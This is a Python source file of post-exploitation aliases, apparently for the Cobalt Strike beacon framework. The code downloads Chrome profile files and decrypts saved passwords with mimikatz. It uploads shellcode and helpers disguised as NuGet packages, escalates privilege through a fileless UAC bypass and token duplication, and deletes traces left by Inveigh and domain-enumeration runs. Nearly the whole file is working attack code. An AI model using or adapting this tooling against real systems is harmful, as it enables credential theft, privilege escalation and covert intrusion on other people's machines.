def _(bid):
    r"""Collect Chrome profile files from the beacon host's default profile.

    The profile directory is built from a ``%localappdata%`` template whose
    placeholder is replaced with ``<guessed home>\AppData\Local``; the home
    directory comes from ``helpers.guess_home`` (a guess, not a queried value).
    ``History``, ``Bookmarks`` and ``Web Data`` are downloaded as-is.
    ``Login Data`` is first copied to a ``.bak2`` sibling, passed to mimikatz
    ``dpapi::chrome /unprotect``, and the copy is then removed with ``brm``.
    The equivalent ``Cookies`` handling is commented out, so ``cookies`` and
    ``cookies_copied`` are computed but never used.

    Args:
        bid: Beacon id the tasks are queued against.
    """
    chrome_dir = r'%localappdata%\Google\Chrome\User Data\Default'
    chrome_dir_guessed = chrome_dir.replace(
        '%localappdata%', r'{}\AppData\Local'.format(helpers.guess_home(bid)))
    login_data = r'{}\Login Data'.format(chrome_dir_guessed)
    cookies = r'{}\Cookies'.format(chrome_dir_guessed)
    history = r'{}\History'.format(chrome_dir_guessed)
    bookmarks = r'{}\Bookmarks'.format(chrome_dir_guessed)
    web_data = r'{}\Web Data'.format(chrome_dir_guessed)
    # Fixed ".bak2" suffix: the copy is a transient on-disk artifact inside the
    # profile directory until the final brm runs.
    login_data_copied = '{}.bak2'.format(login_data)
    cookies_copied = '{}.bak2'.format(cookies)  # unused: Cookies path is commented out below
    # non-protected files (History/Bookmarks)
    aggressor.bdownload(bid, history)
    aggressor.bdownload(bid, bookmarks)
    aggressor.bdownload(bid, web_data)
    # protected files (Login Data/Cookies)
    # The copy is made with bcp rather than a shell "copy" (the shell variant
    # is kept below as a comment); why the live file is not read directly is
    # not stated here.
    #aggressor.bshell(bid, 'copy "{}" "{}"'.format(login_data, login_data_copied))
    aggressor.bcp(bid, login_data, login_data_copied)
    #aggressor.bshell(bid, 'copy "{}" "{}"'.format(cookies, cookies_copied))
    #aggressor.bmimikatz(bid, r'dpapi::chrome /in:"{}" /unprotect'.format(cookies_copied))
    aggressor.bmimikatz(
        bid, r'dpapi::chrome /in:"{}" /unprotect'.format(login_data_copied))
    # Cleanup is queued unconditionally; whether it runs if the mimikatz task
    # fails depends on beacon task semantics not visible here.
    aggressor.brm(bid, login_data_copied)
def _(bid):
    r"""Remove ``temp.exe`` from the guessed home directory and download ``c`` from it.

    Both paths are rooted at ``helpers.guess_home(bid)``; the earlier
    ``AppData\Local`` base is retained as a comment.  Which alias created
    these two files is not visible in this listing.

    Args:
        bid: Beacon id the tasks are queued against.
    """
    #temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
    temp = r'{}'.format(helpers.guess_home(bid))  # effectively str(guess_home(bid))
    out_file = r'{}\c'.format(temp)
    dest = r'{}\temp.exe'.format(temp)
    # Order: the executable is removed before the output file is retrieved.
    aggressor.brm(bid, dest)
    aggressor.bdownload(bid, out_file)
def _(bid):
    """Remove the remote file recorded by 7z-init and clear the module marker.

    ``_uploaded`` is a module-level name defined elsewhere in this file;
    presumably the remote path set by the ``7z-init`` alias (the error text
    is the only evidence here).  When it is unset the alias reports an error
    and returns without tasking the beacon.

    Args:
        bid: Beacon id the removal is queued against.
    """
    global _uploaded
    if not _uploaded:
        aggressor.berror('Run 7z-init first')
        return
    aggressor.brm(bid, _uploaded)
    # Reset so a second invocation reports the error instead of re-removing.
    _uploaded = None
def _(bid, home=None):
    r"""Remove Inveigh output files from ``<home>\AppData\Roaming\Microsoft``.

    The five file names (``clear``, ``log``, ``v1``, ``v2``, ``form``) are
    fixed here; they are assumed to match what the Inveigh alias writes
    (not visible in this listing).

    Args:
        bid: Beacon id the tasks are queued against.
        home: User home directory on the host; when falsy it is taken from
            ``helpers.guess_home(bid)``.
    """
    if not home:
        home = helpers.guess_home(bid)
    directory = r'{}\AppData\Roaming\Microsoft'.format(home)
    aggressor.btask(
        bid, 'Tasked beacon to remove inveigh files in {}'.format(directory))
    # One brm task per file; no check that the file exists first.
    for fname in ('clear', 'log', 'v1', 'v2', 'form'):
        aggressor.brm(bid, r'{}\{}'.format(directory, fname))
def elevate_shellcode_helper(bid, shellcode, function):
    r"""Upload the native helper and ``shellcode`` to the beacon's temp dir, then run ``function``.

    Flow: remove any stale copies, upload ``tools/native.exe`` as
    ``<temp>\NugetPackage.exe`` and ``shellcode`` as ``<temp>\nuget.package``,
    call ``function(bid, '<helper> <shellcode>')``, then remove both files.
    Unlike ``elevate_runas_shellcode``, the remote helper name here is fixed
    rather than randomised.

    Args:
        bid: Beacon id the tasks are queued against.
        shellcode: Passed to ``helpers.upload_to`` alongside a local file
            path, so presumably a local path to the shellcode file — confirm
            against ``helpers.upload_to``.
        function: Callable invoked as ``function(bid, command)``; it is
            expected to execute ``command`` on the host.
    """
    native_helper = utils.basedir('tools/native.exe')
    native_helper_remote = r'{}\NugetPackage.exe'.format(
        helpers.guess_temp(bid))
    shellcode_remote = r'{}\nuget.package'.format(helpers.guess_temp(bid))
    # delete first (silent=True: presumably suppresses task output — verify)
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)
    # upload
    helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
    # invoke: helper path followed by the shellcode path as its argument
    command = '{} {}'.format(native_helper_remote, shellcode_remote)
    function(bid, command)
    # clean up (queued unconditionally after the invoke task)
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)
def elevate_runas_shellcode(bid, user, password, shellcode):
    r"""Upload the native helper and ``shellcode``, then launch the helper via ``brunas``.

    Flow: remove stale copies, log the two remote paths, upload
    ``tools/native.exe`` as ``<temp>\NugetPackage.<random>.exe`` and
    ``shellcode`` as ``<temp>\nuget2.package``, split ``user`` into
    ``DOMAIN\user``, run the helper with ``aggressor.brunas``, remove both
    files.

    Args:
        bid: Beacon id the tasks are queued against.
        user: Must be of the form ``DOMAIN\user``; a value without a
            backslash raises ``RuntimeError``.
        password: Forwarded unchanged to ``aggressor.brunas``.
        shellcode: Passed to ``helpers.upload_to``, so presumably a local
            file path — confirm against ``helpers.upload_to``.

    Raises:
        RuntimeError: ``user`` contains no backslash.
        ValueError: ``user`` contains more than one backslash (the two-name
            unpacking of ``split`` fails).

    Note: both uploads happen before ``user`` is validated, so on either
    error path the two remote files are left in place (the cleanup lines
    are never reached).
    """
    native_helper = utils.basedir('tools/native.exe')
    native_helper_remote = r'{}\NugetPackage.{}.exe'.format(
        helpers.guess_temp(bid), helpers.randstr())
    shellcode_remote = r'{}\nuget2.package'.format(helpers.guess_temp(bid))
    # delete first
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)
    aggressor.blog2(
        bid, 'uploading to {} and {}'.format(native_helper_remote, shellcode_remote))
    # upload
    helpers.upload_to(bid, native_helper, native_helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, shellcode_remote, silent=True)
    if '\\' in user:
        domain, user = user.split('\\')
    else:
        raise RuntimeError('must specify user domain')
    # invoke — note shellcode_remote is not passed on the command line here;
    # presumably the helper locates it itself (TODO confirm against native.exe)
    aggressor.brunas(bid, domain, user, password, native_helper_remote)
    # clean up
    aggressor.brm(bid, native_helper_remote, silent=True)
    aggressor.brm(bid, shellcode_remote, silent=True)
def elevate_token_shellcode_csharp(bid, shellcode):
    r"""Import ``FilelessUACBypass.ps1`` and run ``Invoke-TokenDuplication`` against the uploaded C# helper.

    Flow: import the PowerShell module, upload ``execute_assembly.exe`` as
    ``<temp>\NugetPackage.exe`` (stage1), ``execute_shellcode.exe`` as
    ``<temp>\Stage2.exe`` (stage2) and ``shellcode`` as
    ``<temp>\nuget.package``, run the command through ``bpowerpick``, then
    remove all three files.  Only ``stage2`` appears in the command line;
    how stage1 and the package are consumed is not visible here.  Unlike the
    other ``elevate_*`` helpers there is no delete-before-upload step and the
    cleanup calls do not pass ``silent=True``.

    Args:
        bid: Beacon id the tasks are queued against.
        shellcode: Passed to ``helpers.upload_to``, so presumably a local
            file path — confirm against ``helpers.upload_to``.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))
    execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
    execute_assembly = utils.basedir('tools/execute_assembly.exe')
    stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    #stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
    stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
    helpers.upload_to(bid, execute_assembly, stage1)
    helpers.upload_to(bid, execute_shellcode, stage2)
    helpers.upload_to(bid, shellcode, package)
    # powershell_quote is defined elsewhere in this file.
    command = 'Invoke-TokenDuplication -Binary {}'.format(
        powershell_quote(stage2))
    aggressor.bpowerpick(bid, command)
    aggressor.brm(bid, stage1)
    aggressor.brm(bid, stage2)
    aggressor.brm(bid, package)
def _(bid):
    r"""Remove the file ``c`` from the guessed home directory.

    Companion to the alias that downloads ``<home>\c``; the earlier
    ``AppData\Local`` base is retained as a comment.

    Args:
        bid: Beacon id the removal is queued against.
    """
    #temp = r'{}\AppData\Local'.format(helpers.guess_home(bid))
    temp = r'{}'.format(helpers.guess_home(bid))  # effectively str(guess_home(bid))
    out_file = r'{}\c'.format(temp)
    aggressor.brm(bid, out_file)
def _(bid):
    r"""Remove the ``*.domain`` output files of domain-enum (stage 3/3) from the temp dir.

    The ten file names are fixed here and are assumed to match what the
    earlier domain-enum stages write (not visible in this listing).

    Args:
        bid: Beacon id the tasks are queued against.
    """
    temp = helpers.guess_temp(bid)
    aggressor.btask(
        bid, 'Tasked beacon to clean up files from domain-enum (stage 3/3)')
    # One brm task per file; no existence check.
    aggressor.brm(bid, r'{}\objects.domain'.format(temp))
    aggressor.brm(bid, r'{}\policy.domain'.format(temp))
    aggressor.brm(bid, r'{}\sites.domain'.format(temp))
    aggressor.brm(bid, r'{}\subnets.domain'.format(temp))
    aggressor.brm(bid, r'{}\gpo_localgroups.domain'.format(temp))
    aggressor.brm(bid, r'{}\gpo_delegations.domain'.format(temp))
    aggressor.brm(bid, r'{}\gpo_acls.domain'.format(temp))
    aggressor.brm(bid, r'{}\trusts.domain'.format(temp))
    aggressor.brm(bid, r'{}\managers.domain'.format(temp))
    aggressor.brm(bid, r'{}\interesting_acls.domain'.format(temp))